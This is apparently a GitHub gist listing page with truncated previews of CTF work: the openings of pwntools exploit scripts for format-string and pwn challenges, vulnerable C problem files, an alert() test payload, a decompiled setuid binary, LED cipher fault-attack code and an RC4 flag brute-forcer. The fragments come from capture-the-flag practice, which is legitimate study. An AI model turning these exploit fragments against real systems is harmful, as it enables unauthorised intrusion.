This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <alloca.h> | |
| #include <fcntl.h> | |
| unsigned long long key; | |
| char buf[100]; | |
| char buf2[100]; | |
| int fsb(char** argv, char** envp){ | |
| char* args[]={"/bin/sh", 0}; |
lionaneesh
/ exploit_fsb.py
Last active
March 1, 2019 11:59
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| p = process("/home/fsb/fsb", stdout=open('/dev/null', 'w+')) | |
| key_addr = 0x0804a060 | |
| key_low = key_addr & 0xffff | |
| key_high = (key_addr >> 16) & 0xffff | |
| # Param 14 => 20 | |
| # Param 15 => 21 | |
| p.readuntil("strings(1)") |
lionaneesh
/ problem.c
Created
May 15, 2019 09:23
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| #include <unistd.h> | |
| int main(int argc, char **argv){ | |
| FILE *fp = fopen("level10.pass", "r"); | |
| struct {char pass[20], msg_err[20];} pwfile = {{0}}; | |
| char ptr[0]; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| AddKey(state, keyNibbles, 0); | |
| for(i = 0; i < RN/4; i++){ | |
| int a; | |
| for (j = 0; j < 4; j++) { | |
| for (a = 0; a < 4; a++) { |
lionaneesh
/ led_key_tuple_filtering.py
Last active
June 17, 2019 12:41
Key Tuple Filtering LED Cipher
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| setGF2(4, 0b10011) | |
| # define fault equations | |
| faults_a = [[0, 4, 8, 12], [3, 7, 11, 15], [2, 6, 10, 14], [1, 5, 9, 13]] | |
| faults_d = [[1, 5, 9, 13], [0, 4, 8, 12], [3, 7, 11, 15], [2, 6, 10, 14]] | |
| faults_c = [[2, 6, 10, 14], [1, 5, 9, 13], [0, 4, 8, 12], [3, 7, 11, 15]] | |
| faults_b = [[3, 7, 11, 15], [2, 6, 10, 14], [1, 5, 9, 13], [0, 4, 8, 12]] | |
| coefs = {'a': [4, 8, 0xB, 2], | |
| 'b': [1, 6, 0xE, 2], |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| keyspace = 0 | |
| for a in fault_values['a']: | |
| for b in fault_values['b']: | |
| for c in fault_values['c']: | |
| for d in fault_values['d']: | |
| k0_4_8_12 = sxis[('a', 0)][a].intersection(sxis[('d', 1)][d]).intersection(sxis[('c', 2)][c]).intersection(sxis[('b', 3)][b]) | |
| k1_5_9_13 = sxis[('a', 3)][a].intersection(sxis[('d', 0)][d]).intersection(sxis[('c', 1)][c]).intersection(sxis[('b', 2)][b]) | |
| k2_6_10_14 = sxis[('a', 2)][a].intersection(sxis[('d', 3)][d]).intersection(sxis[('c', 0)][c]).intersection(sxis[('b', 1)][b]) | |
| k3_7_11_15 = sxis[('a', 1)][a].intersection(sxis[('d', 2)][d]).intersection(sxis[('c', 3)][c]).intersection(sxis[('b', 0)][b]) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| alert('hey'); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| undefined8 main(int argc,char **argv) | |
| { | |
| __uid_t __uid; | |
| __uid_t _Var1; | |
| __gid_t __gid; | |
| int iVar2; | |
| char *sh_color; | |
| ulong uVar3; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| from pwn import * | |
| # nc pwn.chal.csaw.io 1005 | |
| win_offset = 0x00001189 | |
| lose_offset = 0x000011f8 | |
| context.terminal = [ '/usr/bin/gnome-terminal', '-e' ] |
lionaneesh
/ solve_droidcon.py
Created
September 19, 2019 21:24
DroidCon, Sect-ctf 2019, RC4 decrypt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from arc4 import ARC4 | |
| data='\xef\x8eX7 CD\xcc\xfb!\x03@\xf5\x10\xf8 \x18\x986\xc09\xcf\x87/\xc2h\xd1\x94\xc6\x83\xfb;aG\xfat\n\xda^\x0f\xb8\xe1]d\xb6=\xd7\xa4\x0216:\x0f\xf8\xf6j\xdeN\xc3\xd5\x82z$^\xfa\xc0\xea\xab\x14\xf1qB\x80\x9c\xc5Z\xd5\xf8\xc0(H\\2\x17_\xa0\xef\xf4\x16q\x00\xbd\x17q\xfd\x10\xef\x17\xe6\xb6\x86\xea[\xb7:\x1c\x85\x8evJ!\x1a\x9d\x00\xefP\x9eml=\x13*g3\x7f\xc7\x97\xb4\xb6' | |
| def decrypt(key): | |
| arc4 = ARC4(key) | |
| config = arc4.decrypt(data) | |
| config = str(config) | |
| if('flag' in config): | |
| print(config, key) |